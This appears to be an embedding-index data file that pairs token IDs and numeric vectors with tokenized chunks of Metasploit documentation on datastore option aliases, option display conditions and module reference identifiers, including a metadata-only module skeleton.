18382, 1010, 3935, 7047, 2007, 1037, 2714, 3800, 2024, 17576, 2098, 1024, 1024, 19130, 18382, 1012, 24944, 2951, 23809, 2063, 7047, 7361, 9285, 2064, 2022, 4096, 1998, 9279, 8848, 21778, 2011, 2478, 1996, 14593, 1024, 3145, 18351, 6685, 1999, 1996, 2047, 5724, 1012, 2005, 2742, 1010, 2000, 14916, 14074, 2214, 7361, 3508, 2000, 2047, 7361, 3508, 1010, 1996 ]
metasploit
116.txt
5
new definitions would look something like : optstring. new ('newoption ', [ true,'a ( sort of ) new option ','hello'], aliases : % w [ oldoption ] ) filtering datastore optionsoptions can be hidden in certain conditions using the conditions : keyword argument to their definition. this allows options to be hidden when they are not relevant based on the value of another option, the selected target or the selected action. the syntax for a condition is * thing * * operator * * value *. thing - one of action, target or the name of a datastore option. operator - one of = =,! =, in, nin. in the case of in and nin ( not - in ), the value is an array of values. value - the value to check for in the condition. when the condition evaluates to true, the option is considered active and displayed to the user. datastore options with no defined conditions are active by default. filter examplesconditions : % w [ version = = 5 ] - active when the version datastore option is 5. conditions : ['action ','in ', % w [ ssrf exec secstore ] ] - active when the action is one of ssrf, exec or secstore [SEP]
[ -0.40517428517341614, -0.008931257762014866, 0.35719504952430725, 0.1890198141336441, -1.0094250440597534, -1.0214132070541382, 0.3202398717403412, 0.41385355591773987, -0.30158740282058716, 0.9655269980430603, 0.47595345973968506, 0.03499280661344528, 0.8072621822357178, 0.16771389544010162, -1.0522547960281372, -0.07843553274869919, -0.2948761582374573, 0.23722195625305176, -0.6422463655471802, 0.6121850609779358, 0.6273366808891296, 0.5533991456031799, -1.150526523590088, -0.21953101456165314, -1.1357545852661133, 0.3982027769088745, -0.36107200384140015, -0.21402645111083984, 0.8674549460411072, 1.079283595085144, -0.5149943828582764, -0.4718647599220276, 0.19036926329135895, -0.13235735893249512, -0.3581911027431488, -0.042393989861011505, 0.4357978403568268, -0.24966201186180115, 0.18401458859443665, -1.3124574422836304, 0.13461636006832123, -0.2142130583524704, 0.8421246409416199, -0.7576251029968262, -1.3621400594711304, -0.7975237369537354, -0.30314016342163086, -0.29324424266815186, 0.15340843796730042, -0.4077203869819641, -0.5523545145988464, -0.4441409409046173, 0.5923104286193848, -0.7352291345596313, 0.03534575551748276, 0.02348964475095272, 0.48694437742233276, 0.9861166477203369, -0.18970412015914917, 0.05633233115077019, -0.5090371966362, 0.033027369529008865, 0.12365268170833588, -0.6607614755630493, 0.33271095156669617, 0.07632173597812653, -0.0821501836180687, -0.12688013911247253, -0.32855549454689026, -0.02841920778155327, 0.08673321455717087, 0.6517047882080078, -0.3590984344482422, -1.0092726945877075, 0.06640403717756271, 0.1774492859840393, 0.19123686850070953, 0.32574236392974854, -0.016668550670146942, 0.6662217974662781, -0.32284417748451233, 0.3063717484474182, 0.6013201475143433, -0.4196682870388031, -0.5665035843849182, 0.14868074655532837, 0.04978538304567337, 0.5554192662239075, 0.002454358385875821, -0.046955227851867676, -0.20897723734378815, 0.7817804217338562, -0.08711685240268707, -0.26102012395858765, 0.5944972038269043, 0.6779848337173462, 0.2609573006629944, -0.0363209992647171, -0.34250542521476746, 0.08792444318532944, 0.9021404385566711, 0.45349034667015076, -0.08985429257154465, -0.0717082992196083, 0.018221700564026833, 1.0216139554977417, 0.2570822536945343, 0.9300235509872437, -1.0921097993850708, -0.44531679153442383, -0.18694213032722473, -0.17265649139881134, 0.6708362102508545, -0.6160627603530884, -0.8456663489341736, 0.6056234836578369, 0.38075879216194153, 0.17628537118434906, -0.4874512553215027, -0.16976332664489746, 0.36630451679229736, -0.12331415712833405, 0.49087703227996826, -0.39108631014823914, -0.17880797386169434, -0.060710497200489044, 0.058068227022886276, 0.5840969085693359, -0.5685024261474609, -0.802823007106781, -0.19358167052268982, 0.4878479838371277, 0.9714150428771973, 1.1712141036987305, 0.5872147679328918, 0.7764787077903748, -0.007991505786776543, 0.15780426561832428, -0.07552701234817505, -0.935835599899292, 0.5438176393508911, 0.15130038559436798, 0.2973714768886566, 1.3789349794387817, 0.33711206912994385, -0.06326350569725037, 0.6818104982376099, 0.06138046830892563, -1.1583747863769531, 0.07839477807283401, -0.7871191501617432, 0.8220171332359314, 0.031044498085975647, 0.06158355623483658, -0.18928073346614838, -0.4977826774120331, -0.28298503160476685, -0.1677643060684204, 0.529288649559021, 0.03328811749815941, -0.21694950759410858, 0.19337642192840576, -0.3448507487773895, 0.5041848421096802, -0.3018099069595337, -0.08458343148231506, -0.6690951585769653, 0.3797908425331116, -0.04590528830885887, -0.07482817023992538, -0.03929943963885307, 0.2757655084133148, -0.6879650354385376, 0.30952373147010803, 0.19568952918052673, 0.24384823441505432, 0.8072800636291504, -0.24718254804611206, 0.23058968782424927, 0.40599995851516724, -0.2090039700269699, 0.4428969621658325, 0.10305828601121902, 0.36132699251174927, 0.693037748336792, -0.18886831402778625, 0.051635224372148514, 0.7403728365898132, -1.1088173389434814, -0.4157484471797943, 0.5982520580291748, -0.12608329951763153, 0.04546642675995827, 0.34725794196128845, 0.15113958716392517, 0.09870534390211105, -0.4631468951702118, 0.7999194264411926, 0.07860296219587326, -0.6181147694587708, -0.3140687048435211, -0.13402706384658813, -0.5491516590118408, 0.5827730298042297, -0.2083800733089447, -0.9496254920959473, -0.35398584604263306, 0.6722245812416077, -0.20291194319725037, 0.4099406898021698, -0.30215129256248474, 0.13221965730190277, -0.8324392437934875, 0.2417478710412979, 0.5194407105445862, -0.7951040863990784, -0.6855928897857666, 0.7600803375244141, 0.49554476141929626, 0.2492205947637558, 0.3562289774417877, 0.6282391548156738, 0.7646210789680481, 1.099374771118164, 0.0638568103313446, -0.8142169117927551, 0.8546541929244995, 1.1655787229537964, 0.06269718706607819, 0.7008321285247803, 0.37861573696136475, 1.1498534679412842, -0.3195625841617584, 1.013427495956421, -0.005218658596277237, 0.6438643336296082, 0.2788037657737732, 0.12966910004615784, -0.5624017119407654, 0.43884024024009705, 0.1609686315059662, 0.52838534116745, 0.3776668906211853, 0.9522728323936462, -0.4724627137184143, -0.09968461096286774, 0.4725671112537384, -0.23478659987449646, 0.026299072429537773, 0.8124294281005859, -0.662367045879364, 0.7844634056091309, 0.43414515256881714, -0.172160342335701, -0.509129524230957, -0.4201713800430298, -0.10992070287466049, 0.23174017667770386, -0.3678007423877716, -0.20140452682971954, 0.622285008430481, 0.4050780236721039, -0.37842798233032227, -0.14592379331588745, 0.34182044863700867, 0.061717819422483444, 1.0834007263183594, -0.4771674871444702, -0.49349862337112427, -1.1391406059265137, -0.4370846450328827, -0.14803171157836914, -0.6739192008972168, 0.1148139238357544, -0.41290032863616943, 0.20174731314182281, 0.20780707895755768, -1.1906037330627441, 0.05298994481563568, -0.8394607901573181, -0.5665339231491089, 0.10354681313037872, -0.2754529118537903, -0.3945630192756653, -0.3299965560436249, 0.07192736864089966, -0.44156646728515625, -0.21902763843536377, -0.9410757422447205, 0.4168122708797455, 0.2177487015724182, 0.11360841244459152, -0.24858564138412476, -0.3830394744873047, 0.22013187408447266, -0.37993741035461426, 0.23412993550300598, -0.2426343858242035, -1.502609372138977, -0.35347482562065125, -0.5999208092689514, -0.10715971887111664, -0.04702506959438324, 0.4289011061191559, -0.47523075342178345, 0.0961771309375763, 0.7376930117607117, 0.01693554036319256, 0.34063512086868286, 1.2843499183654785, -1.294330358505249, 0.1327819973230362, 0.7017263770103455, -0.17329373955726624, -0.8248322010040283, -0.06980424374341965, 0.5156126618385315, 0.05997755378484726, -0.057688821107149124, -0.1379738450050354, 0.0016586602432653308, -0.37581825256347656, 0.02919423021376133, 0.08898498117923737, -0.02877090312540531, 0.6095898747444153, -0.39952346682548523, -1.4841357469558716, 0.1083948016166687, -0.30106815695762634, -0.2792699933052063, -0.07764942944049835, -0.15499460697174072, 0.07319381088018417, 0.05626776069402695, 0.3340502679347992, -0.19665193557739258, -0.8201912045478821, 0.4712323248386383, 0.7367435693740845, 0.10434373468160629, -1.0224286317825317, -0.15033328533172607, -0.1398998647928238, 0.11087685823440552, 0.260372132062912, 0.1656104326248169, -0.36132553219795227, -0.3220674395561218, -0.46012380719184875, 0.29000917077064514, 0.5067332983016968, 0.11314430832862854, 0.038088493049144745, 0.8012211322784424, 0.6760968565940857, -1.0564690828323364, 0.7949914336204529, 0.10400629788637161, -0.8483379483222961, 0.9542232155799866, 0.5107646584510803, -0.6302700042724609, -0.3120114505290985, -0.3392224907875061, -1.0487184524536133, -0.09486996382474899, 0.4790823757648468, 0.9350122213363647, -1.1252683401107788, 0.2275037318468094, -0.35111021995544434, -0.07464291155338287, 0.27293112874031067, -0.08330340683460236, -0.0019987004343420267, 0.8881139159202576, 0.3075418472290039, 0.8026680946350098, -0.48960331082344055, -0.09770898520946503, 0.2564638555049896, 0.8387818336486816, 0.45009398460388184, -0.1597307026386261, 0.42057371139526367, -0.3618852198123932, 0.17328491806983948, -0.3872086703777313, -0.25504961609840393, -0.06492539495229721, -0.880902886390686, 0.5100619196891785, 0.10037581622600555, -0.5634765625, -0.6534452438354492, 0.22786495089530945, 0.3964883089065552, 1.1459400653839111, 0.7361817955970764, 0.2848418056964874, 0.2014521360397339, 0.012618234381079674, 0.2866964638233185, -0.272936075925827, 0.4520792067050934, -0.3547113537788391, -0.1947087049484253, 0.02465406246483326, 0.6990029215812683, -0.08353910595178604, 0.25151893496513367, -0.4518708288669586, -0.0867566466331482, -0.049699462950229645, 0.08890878409147263, -0.5955603718757629, -0.23826490342617035, 0.5206517577171326, 0.0419456847012043, -0.02964106760919094, -0.02112576737999916, -1.0271923542022705, 0.25279587507247925, 0.691070556640625, -1.0801695585250854, 0.07123791426420212, -0.5461046099662781, 0.7659658193588257, 0.16642539203166962, -0.322795569896698, -0.4345409572124481, -0.26161715388298035, -0.03419068828225136, -0.9115086793899536, 0.6493119597434998, 0.8106881380081177, -0.2574692368507385, 0.22235043346881866, -0.6757994294166565, -0.08456543833017349, 0.12537625432014465, -0.9178109765052795, -0.2060656100511551, -0.23034875094890594, 0.18248941004276276, -0.3514423370361328, -0.15751685202121735, -0.5452867150306702, 0.08449084311723709, 0.8629401922225952, -0.2451164722442627, 0.051732707768678665, -1.0503239631652832, -0.07036843150854111, -0.14906121790409088, 0.1708628237247467, -0.6856523156166077, 0.1641853004693985, -0.14193254709243774, 0.10860326141119003, -0.176761195063591, 0.031829364597797394, -0.44153180718421936, -0.6195768117904663, 0.6766981482505798, -0.553046703338623, -0.5263477563858032, 1.113317608833313, 0.008158840239048004, -0.2818808853626251, 0.15809141099452972, 0.18604764342308044, -1.1437338590621948, 0.03574255108833313, -0.8406926989555359, 0.07986482232809067, -0.08337295800447464, -0.299225389957428, -0.10015127807855606, -1.1931918859481812, 1.082105278968811, 0.4275701940059662, -0.39340639114379883, -0.4603603482246399, -0.6860084533691406, -0.6323110461235046, -0.5199318528175354, -0.10736748576164246, 0.475356787443161, -0.5599802732467651, -0.3970510959625244, 0.36591270565986633, -0.5490840077400208, -0.7579254508018494, -0.34979742765426636, -0.2345922291278839, -0.5629943609237671, 0.14770638942718506, -0.1581374704837799, 0.28979337215423584, 0.08755061775445938, -0.3999478816986084, 0.507182776927948, -0.2325248271226883, 0.07856491208076477, -0.45447129011154175, -0.16957759857177734, 0.49515119194984436, 0.3725432753562927, -0.10839203000068665, -0.1283503770828247, -0.8355744481086731, -0.07787393033504486, 0.26620277762413025, -0.36075732111930847, 0.12168700248003006, -0.07403836399316788, 0.15627525746822357, 0.755968451499939, 0.4167228043079376, -0.37731170654296875, -1.0955532789230347, 0.5955425500869751, -0.5716142654418945, 1.053460717201233, -0.5041855573654175, -0.4086507260799408, -0.2501518428325653, -0.18322759866714478, 0.8641682863235474, -0.20422247052192688, 0.5838517546653748, -1.1052131652832031, -0.0742243155837059, -0.06629952043294907, 0.6480937600135803, 0.8122054934501648, -0.04793817549943924, -0.10557079315185547, -0.08485528826713562, 0.4138708710670471, -0.7776612639427185, -0.30126717686653137, 0.5062443614006042, -1.3781533241271973, 0.04423636570572853, 1.1188793182373047, -0.47512635588645935, 0.15422025322914124, -0.4523449242115021, -0.6309167146682739, 0.44002944231033325, -0.14768728613853455, -0.34999778866767883, 0.4264739155769348, -0.6696221232414246, 0.45680853724479675, -0.07391832768917084, 0.030146747827529907, -0.8483185768127441, -0.33879631757736206, -0.8104089498519897, 0.3701484501361847, -0.056901101022958755, -0.8333327770233154, -0.1676749438047409, 0.18133386969566345, 0.8184862732887268, -0.1518154889345169, -0.07657818496227264, -0.5143070816993713, 0.8810920715332031, -0.04313690587878227, 0.5768623948097229, -0.5185020565986633, -0.20096296072006226, -1.0070397853851318, -0.4023813009262085, 0.5487309098243713, -0.36843180656433105, 0.2865355312824249, 0.4175693392753601, -0.7232499718666077, 0.7302753925323486, -0.1701779067516327, 0.1469162106513977, 0.9050329923629761, 0.455192893743515, -0.1401250958442688, -0.19913539290428162, -0.44643455743789673, 0.7013471126556396, 0.2930310368537903, 0.5397153496742249, 0.6047966480255127, -0.5193821787834167, -0.6477407813072205, -0.588280200958252, -0.7841883897781372, -0.21861550211906433, 0.25344428420066833, 0.6785088181495667, -0.23443017899990082, 0.6952393651008606, -0.31821200251579285, -0.3474828004837036, -0.9689195156097412, 0.9980767369270325, -0.091764435172081, 0.10631357878446579, 0.7939997315406799, 0.5802620053291321, -0.005781181622296572, 0.6364609599113464, -0.023925336077809334, 0.4590163230895996, -0.3315330147743225, 0.3773781359195709, 0.1396026909351349, -0.9530803561210632, 0.6290682554244995, 0.2225165218114853, -1.045151948928833, -0.2529834508895874, 0.5435355305671692, -0.19292359054088593, 0.9109886288642883, -0.08034918457269669, -0.01734454371035099, 0.207052543759346, -0.3186739683151245, 0.742254376411438, -0.7060158848762512, 0.6062851548194885, 0.8083390593528748, -0.2690466046333313, 0.25189921259880066, -0.5725098848342896, -0.17396779358386993, 0.3975769281387329, -0.03680418059229851, 0.04702553153038025, -0.6278961300849915, 0.09050508588552475, -0.3058460056781769, 0.2640102207660675, 1.0920300483703613, 1.080434799194336, 0.8735679388046265, 0.558104932308197, -0.27404654026031494, 1.0619988441467285, -0.10969962179660797, -0.25923842191696167, 1.2483302354812622, -0.9306967854499817, -1.0169564485549927, 0.5592213869094849, -0.1920580267906189, -0.1554596871137619, -0.2830239534378052, -0.4126351773738861, -0.25618141889572144, 0.7820828557014465, 1.2082921266555786, -0.1907712072134018, -1.2281153202056885, 0.11505088955163956, -0.703981339931488, 0.20188358426094055, -0.5162057280540466, -0.8743941783905029, -0.3851560354232788, 0.23139096796512604, 0.20902559161186218, -0.4879584014415741, -0.2991880476474762, 0.2062608301639557, 0.15501734614372253, 0.47579994797706604, -0.4377864897251129, 0.1005687564611435, -0.5890905261039734, -0.22741559147834778, -1.034170389175415, 0.13724176585674286, 0.0030192644335329533, -0.3800410032272339, -0.5023588538169861, 0.029323948547244072, -0.3064635694026947, 0.18872882425785065, -0.438091516494751, -0.019862903282046318, -0.5936711430549622, -0.5299015045166016, 0.2008810043334961, -0.46251538395881653, -0.571113646030426, 0.8296657204627991, 0.3344840109348297, 0.1393488645553589, -0.37346145510673523, -0.41817495226860046, 0.2863543629646301, 0.34970784187316895, -0.2819930613040924, 0.00035597418900579214, -0.21541443467140198, -0.6540144681930542, -0.2946963906288147, 0.02246227115392685, -0.3742365539073944, 0.06363370269536972, -0.5153957009315491, -0.11400257050991058, 0.590464174747467, -0.017243945971131325, -0.6761361360549927, 0.4284818470478058, 0.24289382994174957, 0.317577600479126, -0.21518100798130035, -0.34971311688423157, -0.03203084319829941, -0.08468292653560638, -0.44278499484062195, 0.2598890960216522, -0.19286446273326874, -0.447454571723938, 0.6783186197280884, -0.26706114411354065, 0.3193199634552002, -0.1479976624250412, 0.8966926336288452, -0.5255070924758911, -1.0212721824645996, -0.29854699969291687, -0.12482327222824097, 1.1723607778549194, 0.7055125832557678, 0.5696570873260498, 0.5002465844154358, -0.3042422831058502, -0.4222260117530823, 0.420822411775589, -0.4945513904094696, -0.6634560823440552, 0.6281833052635193, -0.4679703712463379, -0.3149377107620239, -0.47337254881858826, -0.17796289920806885, -0.6313287615776062, 0.6077670454978943, 0.1576404720544815, 0.17840798199176788, 0.7143404483795166, -0.1165165826678276, 0.8655343055725098, -0.1721499115228653, -0.6106681227684021, 0.7097551822662354, -0.2506101727485657, -0.3474026620388031, -0.7643569707870483, -0.2831876277923584, 0.4090264141559601, -0.00345410848967731, 0.09045827388763428, -0.5362117290496826, -0.27798378467559814, -0.17772817611694336, 0.6777723431587219, 0.09916780889034271, -0.3878082036972046, -0.7133570313453674, 0.27878299355506897, -0.8849498629570007, 0.2964265048503876, -0.07057932764291763, 0.7737858295440674, 0.04186220094561577, -0.26090165972709656, -0.3524225652217865, 0.26085364818573, 0.1131410077214241, -0.6662307977676392, 0.10221416503190994, 0.3765632212162018, 0.5286622047424316, -0.05333251506090164, -0.8134403228759766, 0.8858258724212646, 0.611415445804596, 1.2933679819107056, 0.9196922183036804, 0.13088463246822357, -0.03880024701356888, 0.7388743758201599, -0.069936104118824, -0.7616892457008362, 1.0107097625732422, 0.09131207317113876, -0.02213587984442711, -0.2735164165496826, 0.17753763496875763, -0.2612593173980713, -0.6681204438209534, -0.028024086728692055, 0.40877094864845276, -0.523651659488678, -0.057221826165914536, 0.36695417761802673, -0.5295525193214417, -0.12492051720619202, -0.5042778253555298, -0.22074131667613983, -0.3593944013118744, -0.05466461181640625, 0.39925625920295715, 0.05110786110162735, -0.9018159508705139, 0.14614981412887573, 0.8528379797935486, 0.3357563018798828, -0.5738306641578674, 0.35900118947029114, 0.7615136504173279, 0.9350074529647827, -0.13184073567390442, 0.006599263288080692, 0.02361391857266426, 0.1440453976392746, -0.30780917406082153, -0.4868530035018921, 0.06371735781431198, -0.20967842638492584, -0.6362001895904541, -0.03328152745962143, 0.34543994069099426, -1.0194745063781738, 0.2973092198371887, -1.4181352853775024, 0.6634144186973572, -0.17797933518886566, -0.44162020087242126, 0.7876602411270142, -0.21335554122924805, 0.0684456080198288, 0.6789426207542419, 0.29622870683670044, -0.29631251096725464, 0.1815895438194275, 0.561166524887085, 0.23624303936958313, 0.8056486248970032, 0.44934502243995667, -0.2243567854166031, -0.6190114617347717, 0.31781941652297974, 0.3614616096019745, -0.2716631591320038, -0.12937070429325104, -0.015120945870876312, -0.7225798964500427, 0.34474149346351624, -0.4230857193470001, -0.044037654995918274, 0.23152758181095123, -0.22109632194042206, -0.7555567026138306, -0.05822990834712982, 0.544052243232727, -0.593440055847168, 0.007585205603390932, 0.3574443459510803, -0.06818415224552155, 0.0925174131989479, -0.5388888120651245, 0.004673940595239401, -0.07309981435537338, 0.46858277916908264, -0.5070237517356873, 0.31597888469696045, -0.04419335350394249, -0.11773962527513504, -0.1968420445919037, -0.4284050762653351, 0.12276419997215271, 0.14161594212055206, -0.2654949724674225, -0.5687831044197083, 0.540075421333313, 0.748378336429596, 0.7945268750190735, 0.42027154564857483, -0.4984716475009918, 0.39606428146362305, -0.285751610994339, 0.5604584217071533, -0.2889021933078766, 1.300330638885498, 0.3634803891181946, -0.628020167350769, 0.5135343670845032, 1.0017149448394775, 0.33936768770217896, -0.48853468894958496, 0.20691636204719543, 0.17428424954414368, 0.9906104803085327, -0.36918237805366516, -0.29134294390678406, -0.2675514221191406, 0.6897103190422058, -0.17550022900104523, -0.14705030620098114, 0.2536350190639496, 0.04848248139023781, -1.1914384365081787, -0.11664746701717377, -0.8346269726753235, 0.13246579468250275, -0.6933283805847168, -0.08183751255273819, 0.26225921511650085, -1.4823845624923706, 4.075279712677002, 1.0668652057647705, 1.2905528545379639, 0.35052490234375, 0.4485071301460266, 0.7437433004379272, -0.4224422872066498, -0.3515844941139221, 0.28296443819999695, -0.5759923458099365, 1.1555358171463013, -0.1908271312713623, -0.48721474409103394, 0.3588385581970215, -0.11619455367326736, 0.3893718719482422, -0.9222710728645325, 0.43231281638145447, -0.1767638921737671, -0.6342622637748718, -0.6114801168441772, 0.8891193270683289, 0.16751185059547424, 0.6712843775749207, -0.49952563643455505, 0.23225565254688263, 0.05096736550331116, -0.7830981016159058, -0.006906983442604542, -0.46616289019584656, 0.09627319127321243, -1.0846388339996338, 0.5409299731254578, 0.19021375477313995, -0.019461091607809067, 0.48433852195739746, 0.7269799709320068, -0.03268790990114212, -0.0739201232790947, -0.3425747752189636, 0.5887993574142456, -0.3546850085258484, -0.32381290197372437, 0.20466384291648865, -0.4150357246398926, -0.35828912258148193, -0.5699081420898438, 0.7007787823677063, 0.2961035668849945, -0.13637621700763702, 1.1801854372024536, -0.21430639922618866, 0.917143702507019, 0.00020869194122496992, -0.7566462755203247, 0.6553281545639038, 0.10016924887895584, -0.13312995433807373, -0.08805262297391891, 0.20745785534381866, 0.11337108165025711, 0.03118525817990303, -0.028213029727339745, 0.137023463845253, -0.09172961860895157, 0.30110815167427063, 0.22131411731243134, 0.47585394978523254, -0.08588096499443054, -0.7217746376991272, 0.6011268496513367, -0.45127448439598083, -0.4500749707221985, -0.5768347382545471, 0.5019481778144836, -0.4889213740825653, -0.1645883321762085, 0.5009006857872009, 0.06676434725522995, -0.4411679208278656, 0.004286178387701511, 0.2579914629459381, -0.4357917904853821, -0.6692472696304321, 0.2474711835384369, 0.06942635774612427, -0.6879733204841614, 0.08422516286373138, 0.007838468998670578, -0.7212033867835999, 0.06503167748451233, 0.671167254447937, 0.2608259916305542, -0.26378676295280457, 0.3955548405647278 ]
[ 2047, 15182, 2052, 2298, 2242, 2066, 1024, 23569, 3367, 4892, 1012, 2047, 1006, 1005, 2047, 7361, 3508, 1005, 1010, 1031, 2995, 1010, 1005, 1037, 1006, 4066, 1997, 1007, 2047, 5724, 1005, 1010, 1005, 7592, 1005, 1033, 1010, 14593, 2229, 1024, 1003, 1059, 1031, 2214, 7361, 3508, 1033, 1007, 22910, 2951, 23809, 2063, 7047, 7361, 9285, 2064, 2022, 5023, 1999, 3056, 3785, 2478, 1996, 3785, 1024, 3145, 18351, 6685, 2000, 2037, 6210, 1012, 2023, 4473, 7047, 2000, 2022, 5023, 2043, 2027, 2024, 2025, 7882, 2241, 2006, 1996, 3643, 1997, 2178, 5724, 1010, 1996, 3479, 4539, 2030, 1996, 3479, 2895, 1012, 1996, 20231, 2005, 1037, 4650, 2003, 1008, 2518, 1008, 1008, 6872, 1008, 1008, 3643, 1008, 1012, 2518, 1011, 2028, 1997, 2895, 1010, 4539, 2030, 1996, 2171, 1997, 1037, 2951, 23809, 2063, 5724, 1012, 6872, 1011, 2028, 1997, 1027, 1027, 1010, 999, 1027, 1010, 1999, 1010, 9152, 2078, 1012, 1999, 1996, 2553, 1997, 1999, 1998, 9152, 2078, 1006, 2025, 1011, 1999, 1007, 1010, 1996, 3643, 2003, 2019, 9140, 1997, 5300, 1012, 3643, 1011, 1996, 3643, 2000, 4638, 2005, 1999, 1996, 4650, 1012, 2043, 1996, 4650, 16157, 2015, 2000, 2995, 1010, 1996, 5724, 2003, 2641, 3161, 1998, 6913, 2000, 1996, 5310, 1012, 2951, 23809, 2063, 7047, 2007, 2053, 4225, 3785, 2024, 3161, 2011, 12398, 1012, 11307, 4973, 8663, 20562, 2015, 1024, 1003, 1059, 1031, 2544, 1027, 1027, 1019, 1033, 1011, 3161, 2043, 1996, 2544, 2951, 23809, 2063, 5724, 2003, 1019, 1012, 3785, 1024, 1031, 1005, 2895, 1005, 1010, 1005, 1999, 1005, 1010, 1003, 1059, 1031, 20896, 2546, 4654, 8586, 10819, 23809, 2063, 1033, 1033, 1011, 3161, 2043, 1996, 2895, 2003, 2028, 1997, 20896, 2546, 1010, 4654, 8586, 2030, 10819, 23809, 2063, 102 ]
metasploit
116.txt
6
[CLS] on this pagelist of supported reference identifierscode example of references in a modulea reference in a metasploit module is a source of information related to the module. this can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. the more you have the better. however, you should not use this as a form of advertisement. list of supported reference identifiersidsourcecode examplecvecvedetails. com ['cve ','2014 - 9999'] cwecwe. mitre. org ['cwe ','90'] bidsecurityfocus. com ['bid ','1234'] msbtechnet. microsoft. com ['msb ','ms13 - 055'] edbexploit - db. com ['edb ','1337'] us - cert - vukb. cert. org ['us - cert - vu ','800113'] zdizerodayinitiative. com ['zdi ','10 - 123'] wpvdbwpvulndb. com ['wpvdb ','7615'] packetstormpacketstormsecurity. com ['packetstorm ','132721'] urlanything ['url ','http : / / example. com / blog. php? id = 123'] aka ( deprecated * ) anything ['aka ','shellshock'] good to know aka names for modules are no longer stored as a reference identifier, but rather in the notes metadata field as shown in the example below. code example of references in a moduleclass metasploitmodule < msf : : exploit : : remote rank = normalranking def initialize ( info = { } ) super ( update _ info ( info,'name'= >'code example ','description'= > % q { this is an example of a module using references },'license'= > msf _ license,'author'= > ['unknown'],'references'= > [ ['cve ','2014 - 9999'], ['bid ','1234'], ['url ','http : /
[ 0.4959622323513031, -0.23319576680660248, -0.07916145771741867, 0.27171146869659424, 0.21891823410987854, -0.42201313376426697, -0.19033412635326385, -0.19106538593769073, 0.495671808719635, 0.4251684844493866, 0.3824525475502014, 0.2043052464723587, 0.6459667086601257, -0.2866741120815277, -0.7958307862281799, -0.12753033638000488, 0.019581981003284454, -0.3560781478881836, -1.3884130716323853, -0.14977023005485535, 0.028975198045372963, 0.3179498016834259, -0.6309555172920227, -0.1239921897649765, -0.5852420926094055, 0.7180594205856323, 0.360286146402359, -0.30880996584892273, 0.6892330646514893, 0.8377429246902466, 0.4780472218990326, -0.4774923026561737, -0.1299324780702591, -0.5763207077980042, 0.3534562289714813, -0.18467389047145844, 0.31361493468284607, -0.7004548907279968, 0.021627290174365044, -1.04115891456604, 0.6069530248641968, -0.4894586503505707, 0.2880573272705078, -0.2728642225265503, -0.12593328952789307, 0.19065357744693756, 0.0039671799167990685, 0.5292837023735046, 0.5744076371192932, -1.2503982782363892, 0.23446595668792725, 0.26087427139282227, 0.03695156052708626, 0.5216078162193298, 0.3474826514720917, -0.17107605934143066, -0.13099707663059235, -0.5555422306060791, -0.3956524729728699, 0.12668123841285706, -0.29130643606185913, 0.5910940766334534, 0.3192925453186035, -0.577077329158783, 0.07566142082214355, 0.24564526975154877, 0.16539788246154785, -0.6538965702056885, 0.02528359740972519, -0.32917559146881104, -0.24769608676433563, 0.5370370149612427, -0.40268346667289734, -0.5249618887901306, -0.44494009017944336, -0.22409649193286896, 0.49774494767189026, -0.42591333389282227, 0.06662171334028244, 0.336589515209198, -0.353140652179718, 1.059779167175293, 0.0671951100230217, -0.11664347350597382, -0.14730143547058105, -0.45512229204177856, 0.22247926890850067, 0.4786534607410431, -0.4881773591041565, 0.881726086139679, 0.5368754863739014, 0.9041709899902344, -0.5907436013221741, -0.015189885161817074, 0.5791609883308411, 0.18798592686653137, -0.4121212363243103, 0.2957526445388794, 0.32880091667175293, -0.29219862818717957, 0.5141595602035522, 1.037936806678772, 0.4107121527194977, 0.09241027384996414, -0.03368468955159187, 0.417774498462677, -0.03859342634677887, 0.010743814520537853, 0.2319025993347168, 0.0014299405738711357, 0.6213237643241882, 0.054321881383657455, -0.16133970022201538, -0.9907976388931274, -0.2258356660604477, 0.29685890674591064, 0.15310512483119965, 0.0031476905569434166, -0.4033384919166565, 0.7676594853401184, -0.022190717980265617, -0.21555359661579132, 0.26582467555999756, -0.20540009438991547, 0.34942325949668884, 0.295053631067276, 0.3001410961151123, 0.7519662976264954, -0.5683569312095642, 0.0218103788793087, -0.19330382347106934, -0.458071768283844, -0.5657209753990173, -0.03937208279967308, 0.18649335205554962, 0.29667267203330994, 0.08924397081136703, 0.638494610786438, 0.3435823619365692, -0.9479353427886963, 0.20629099011421204, 0.8120978474617004, -0.15864701569080353, 1.112798810005188, -0.03079777956008911, -0.02208850346505642, 0.07417605817317963, -0.1674622893333435, -0.20963941514492035, 0.13297243416309357, -0.12490974366664886, -0.10482131689786911, 0.6106747388839722, -0.23697777092456818, -0.2299516797065735, 0.2963988184928894, -0.4840252101421356, 0.6299916505813599, -0.27976933121681213, 0.16587889194488525, 0.11527589708566666, 1.1944785118103027, -0.18561691045761108, 0.8155128359794617, -0.04758777469396591, -0.01970849744975567, -0.41062265634536743, -0.1927020251750946, -0.23934955894947052, 0.2313774824142456, 0.09616902470588684, 0.11466974765062332, 0.1080312579870224, 0.7194989323616028, 1.4947946071624756, 0.8947702646255493, -0.20694081485271454, -0.014290280640125275, 0.4511986970901489, 0.41198933124542236, -0.847762942314148, 0.49431055784225464, 0.6369046568870544, 0.8192003965377808, 0.2638128995895386, 0.42441895604133606, -0.15071390569210052, -0.6728240251541138, 0.05908464267849922, -0.2949434518814087, 0.10968374460935593, 0.6039917469024658, -0.5530123710632324, 0.30811643600463867, 0.8464033603668213, 0.2271147072315216, -0.6893396973609924, -0.1759651154279709, -0.22864380478858948, -1.139127492904663, -0.7174368500709534, 0.5955493450164795, -0.5189918279647827, 0.8882271647453308, 0.018307220190763474, -0.3290911912918091, 0.4924680292606354, 1.245076060295105, 0.015290096402168274, 0.7801103591918945, 0.4563446342945099, -0.22756151854991913, -0.4147762656211853, 0.027952635660767555, 0.14344245195388794, -0.8152163624763489, -0.9589990377426147, 0.6238124370574951, -0.1161314845085144, 0.3393552005290985, -0.008847655728459358, 0.32587432861328125, 0.0024435152299702168, 0.4928000867366791, -0.7172080874443054, -0.2870432138442993, -0.10492019355297089, 0.1552794873714447, -0.4045182168483734, -0.12248055636882782, -0.07712853699922562, 0.8039073348045349, 0.02320137433707714, 0.7250733971595764, 0.15917734801769257, -0.6175881028175354, -0.18966615200042725, 0.9798398613929749, -0.29912447929382324, 0.06732988357543945, 0.3502829968929291, 0.3755902349948883, 0.3642030954360962, 0.4570241868495941, 0.13250885903835297, 0.42723169922828674, 0.31458353996276855, -0.23245906829833984, 0.15473957359790802, 